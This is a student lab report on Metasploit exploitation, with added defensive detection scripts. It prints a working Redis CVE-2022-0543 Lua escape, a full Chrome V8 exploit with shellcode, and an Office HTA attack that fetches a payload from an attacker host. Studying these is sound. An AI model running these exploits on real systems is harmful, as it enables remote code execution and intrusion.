20202411 2022-2023-2 "Network and System Attack and Defense Techniques" Lab 6 Report


1. Experiment content

The main content of this lab is learning to exploit vulnerabilities with Metasploit. Lab 2 already gave Metasploit a first try, but this lab goes further and is also considerably more of a headache. Four areas are attempted: an active attack, an attack against a browser, an attack against a client application, and the use of an auxiliary module.

2. Experiment procedure

2.1 An active-attack exercise, using the newest similar vulnerability available

CVE-2022-0543

This is the vulnerability I chose for an earlier vulnerability-reproduction exercise: a sandbox escape in the Redis database. By executing Lua code inside Redis that loads a library through the package module, it runs commands and escalates privileges.

This vulnerability is so simple that msfconsole is hardly needed: connecting directly to the database is enough to attack it, which makes it very hard to defend against. It has a CVSS score of 10, and one line of code yields root privileges. The code is as follows:

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

As can be seen, the identity information of the root user is returned directly.
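To see what this attack looks like from the defender's side, here is an added example (not part of the original report and not Metasploit code). It parses the lines that Redis prints for the MONITOR command and flags scripts sent through EVAL or SCRIPT LOAD that reference Lua names a properly sandboxed script should never reach, such as the package.loadlib and io.popen calls used above; it also audits a redis.conf for the compensating controls that keep unauthenticated network clients away from EVAL. The MONITOR lines and the redis.conf are constructed samples, and the list of suspicious names is an assumption of the example.

```python
"""Detection helper for CVE-2022-0543-style Lua sandbox escapes in Redis.

Added example, not part of the original report and not Metasploit code.
It parses lines in the format printed by the Redis MONITOR command and
flags scripts sent via EVAL or SCRIPT LOAD that reference Lua names the
Redis script sandbox is meant to hide; it also audits a redis.conf for
compensating controls. All sample inputs below are constructed.
"""
import re
from dataclasses import dataclass

# A MONITOR line looks like: <timestamp> [<db> <client addr>] "CMD" "arg" ...
MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<addr>[^\]]+)\] (?P<rest>.*)$')
# Quoted arguments; inner quotes are escaped by MONITOR as \"
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Lua names that must not be reachable from a properly sandboxed script
# (assumed indicator list; package.loadlib and io.popen are the ones the
# exploit above relies on).
SUSPICIOUS = ("package.loadlib", "io.popen", "os.execute", "loadstring", "dofile")


@dataclass
class Finding:
    ts: str
    addr: str
    command: str
    indicators: tuple


def parse_monitor_line(line):
    """Split one MONITOR line into (timestamp, client address, [args])."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"') for a in ARG_RE.findall(m.group("rest"))]
    return (m.group("ts"), m.group("addr"), args) if args else None


def script_body(args):
    """Return (command label, Lua source) for commands that carry a script."""
    cmd = args[0].upper()
    if cmd == "EVAL" and len(args) > 1:
        return cmd, args[1]
    if cmd == "SCRIPT" and len(args) > 2 and args[1].upper() == "LOAD":
        return "SCRIPT LOAD", args[2]
    return cmd, None


def scan_monitor_log(lines):
    """Flag every script that references a sandbox-escaping Lua name."""
    findings = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, addr, args = parsed
        cmd, body = script_body(args)
        if body is None:
            continue
        hits = tuple(tok for tok in SUSPICIOUS if tok in body)
        if hits:
            findings.append(Finding(ts, addr, cmd, hits))
    return findings


def audit_redis_conf(conf_lines):
    """List compensating controls missing from a redis.conf.

    These do not replace patching the Redis package, but they keep an
    unauthenticated client on the network from reaching EVAL at all.
    """
    active = [l.strip() for l in conf_lines
              if l.strip() and not l.strip().startswith("#")]
    checks = {
        "protected-mode yes": lambda l: l == "protected-mode yes",
        "requirepass": lambda l: l.startswith("requirepass "),
        "bind": lambda l: l.startswith("bind "),
        "rename-command EVAL": lambda l: l.startswith("rename-command EVAL "),
    }
    return [name for name, ok in checks.items() if not any(ok(l) for l in active)]


# Constructed MONITOR output: one normal client and one abusing EVAL.
SAMPLE_MONITOR = [
    '1678901234.100000 [0 10.0.0.5:51000] "GET" "session:42"',
    '1678901234.200000 [0 10.0.0.9:51777] "EVAL" "local io_l = package.loadlib(\\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\\", \\"luaopen_io\\"); local io = io_l(); local f = io.popen(\\"id\\", \\"r\\"); return f:read(\\"*a\\")" "0"',
    '1678901234.300000 [0 10.0.0.5:51000] "EVAL" "return redis.call(\'incr\', KEYS[1])" "1" "counter"',
    '1678901234.400000 [0 10.0.0.9:51777] "SCRIPT" "LOAD" "return os.execute(\\"id\\")"',
]

# Constructed redis.conf carrying the weak settings an unhardened install may have.
SAMPLE_CONF = [
    "# redis.conf (constructed sample)",
    "bind 0.0.0.0",
    "protected-mode no",
    "port 6379",
]

if __name__ == "__main__":
    for f in scan_monitor_log(SAMPLE_MONITOR):
        print(f"{f.ts} {f.addr} {f.command}: {', '.join(f.indicators)}")
    print("missing hardening:", audit_redis_conf(SAMPLE_CONF))
```

Running it reports the two scripts from 10.0.0.9 (one EVAL, one SCRIPT LOAD) together with the indicators found, and lists protected-mode, requirepass and the EVAL rename as missing from the sample configuration. Feeding real MONITOR output into scan_monitor_log works the same way, though MONITOR itself costs throughput and is better used briefly while investigating than left on permanently.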

2.2 An attack against a browser, using the newest similar vulnerability available

B6-2021-041301
This vulnerability is a 0day reported by 360CERT: with the sandbox disabled, the Chrome browser can be made to run arbitrary commands.

Two files are needed, exp.html and exp.js. When the browser opens exp.html it loads exp.js, and the payload code in that JS file launches the calculator program.
exp.html is as follows:

<script src="exp.js"></script>

exp.js is as follows:

/*
BSD 2-Clause License
Copyright (c) 2021, rajvardhan agarwal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);

function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

const _arr = new Uint32Array([2**31]);

function foo(a) {
    var x = 1;
    x = (_arr[0] ^ 0) + 1;

    x = Math.abs(x);
    x -= 2147483647;
    x = Math.max(x, 0);

    x -= 1;
    if(x==-1) x = 0;

    var arr = new Array(x);
    arr.shift();
    var cor = [1.1, 1.2, 1.3];

    return [arr, cor];
}

for(var i=0;i<0x3000;++i)
    foo(true);

var x = foo(false);
var arr = x[0];
var cor = x[1];

const idx = 6;
arr[idx+10] = 0x4242;

function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}

function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}

var float_array_map = ftoi(cor[3]);

var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);

function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}

function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}

function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);

    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();

As can be seen, the calculator runs as soon as this page is opened.

2.3 An attack against a client application such as Adobe or Office, using the newest similar vulnerability available

This task was the most annoying one.

We chose Office 2016 as the target client and entered the following commands in msfconsole to generate the payload file.

search office
use exploit/windows/fileformat/office_word_hta
exploit

The target machine downloads the payload by visiting http://10.211.55.22:8080/default.hta, served by the attacking machine, and chooses to keep the file at the browser's warning prompt. After the file is double-clicked and run, msfconsole receives the connection and can control the host.

2.4 Successfully apply any auxiliary module

For the final auxiliary-module part I followed last year's blogs and used a port scan. auxiliary/scanner/portscan/ack sends probes with the TCP ACK flag set in order to detect whether a firewall is filtering: any scanned port that is not protected by a firewall replies with RST whether it is open or closed, and such unprotected ports are reported as UNFILTERED. Enter the following commands in msfconsole:

use auxiliary/scanner/portscan/ack
search auxiliary
set payload windows/meterpreter/reverse_tcp
show options
set PORTS 1-1024
set RHOST 120.46.218.88
exploit

Because for this part I used a cloud server whose security group closes some ports, and because the scan is extremely slow without multithreading, only two ports had been found after a long wait. These two ports are the ones reported as UNFILTERED, that is, not protected by the firewall.
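From the scanned host's point of view, an ACK scan is a burst of bare ACK segments (no SYN, no payload) from one source to many destination ports, none of which belong to an established connection, and every unfiltered port answers with the RST that the module reports as UNFILTERED. The following added example (not part of the original report and not Metasploit code) parses netfilter log lines of the kind the iptables LOG target writes and reports sources that sent bare ACKs to at least a threshold number of distinct ports. The log lines are constructed for illustration and the threshold is an assumption.

```python
"""Spotting an ACK scan from the defender's side.

Added example, not part of the original report and not Metasploit code.
It parses netfilter (iptables LOG target) lines and reports sources that
sent bare ACK segments to at least min_ports distinct destination ports.
The log lines below are constructed for illustration.
"""
import re
from collections import defaultdict

FIELD_RE = re.compile(r"\b(SRC|DST|PROTO|SPT|DPT)=(\S+)")
# netfilter prints each set TCP flag as its own token after RES=
FLAG_TOKENS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}


def parse_netfilter_line(line):
    """Return (src, dport, flags) for a TCP line, None for anything else."""
    fields = dict(FIELD_RE.findall(line))
    if fields.get("PROTO") != "TCP" or "DPT" not in fields:
        return None
    flags = frozenset(tok for tok in line.split() if tok in FLAG_TOKENS)
    return fields["SRC"], int(fields["DPT"]), flags


def detect_ack_scan(lines, min_ports=10):
    """Map each source that bare-ACKed >= min_ports distinct ports to those ports.

    min_ports is an assumed threshold; tune it to the host's normal traffic.
    """
    ports_by_src = defaultdict(set)
    for line in lines:
        parsed = parse_netfilter_line(line)
        if parsed is None:
            continue
        src, dport, flags = parsed
        if flags == {"ACK"}:  # bare ACK: the probe an ACK scan sends
            ports_by_src[src].add(dport)
    return {src: sorted(p) for src, p in ports_by_src.items()
            if len(p) >= min_ports}


# Constructed log: 12 bare ACK probes from one source, then ordinary traffic
# (a SYN, an ACK+PSH on an established connection, and a UDP datagram).
SAMPLE_NETFILTER = [
    f"Mar  1 12:00:{i:02d} gw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=10.0.0.7 "
    f"LEN=40 PROTO=TCP SPT={40000 + i} DPT={i + 1} WINDOW=1024 RES=0x00 ACK URGP=0"
    for i in range(12)
] + [
    "Mar  1 12:01:00 gw kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=10.0.0.7 "
    "LEN=60 PROTO=TCP SPT=51234 DPT=443 WINDOW=64240 RES=0x00 SYN URGP=0",
    "Mar  1 12:01:01 gw kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=10.0.0.7 "
    "LEN=52 PROTO=TCP SPT=51234 DPT=443 WINDOW=502 RES=0x00 ACK PSH URGP=0",
    "Mar  1 12:01:02 gw kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=10.0.0.7 "
    "LEN=28 PROTO=UDP SPT=5353 DPT=53 LEN=8",
]

if __name__ == "__main__":
    for src, ports in detect_ack_scan(SAMPLE_NETFILTER).items():
        print(f"possible ACK scan from {src}: {len(ports)} ports, "
              f"{ports[0]}-{ports[-1]}")
```

On the sample log only 203.0.113.5 is reported, with ports 1 through 12; the SYN, the ACK+PSH of an established session and the UDP datagram from 198.51.100.9 are ignored. Lines of this shape come from a rule that logs ACK-only segments not belonging to a tracked connection, for example an iptables rule combining --tcp-flags ALL ACK with -m conntrack --ctstate INVALID and the LOG target, which is also what makes a stateful firewall answer nothing instead of RST and so report to the scanner as filtered.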

3. Problems and solutions

  • Problem 1: Adobe Acrobat Reader 8 crashes as soon as the trojan PDF is opened
  • Solution to Problem 1: in earlier attempts it had succeeded, but this time it simply would not work at all. There was nothing for it but to switch clients; I tried Wireshark, Sunflower (向日葵), Redis and the rest one after another, and in the end chose the Office vulnerability. Truly a hassle of hassles.

4. Learning reflections and thoughts

Compared with the previous Metasploit lab, this one looks like much less work, but actually doing it was really difficult, because some vulnerabilities have already been patched and some crash as soon as they are launched, which is exactly why the newest vulnerabilities have to be found. Still, this lab made it clear just how powerful Metasploit really is.
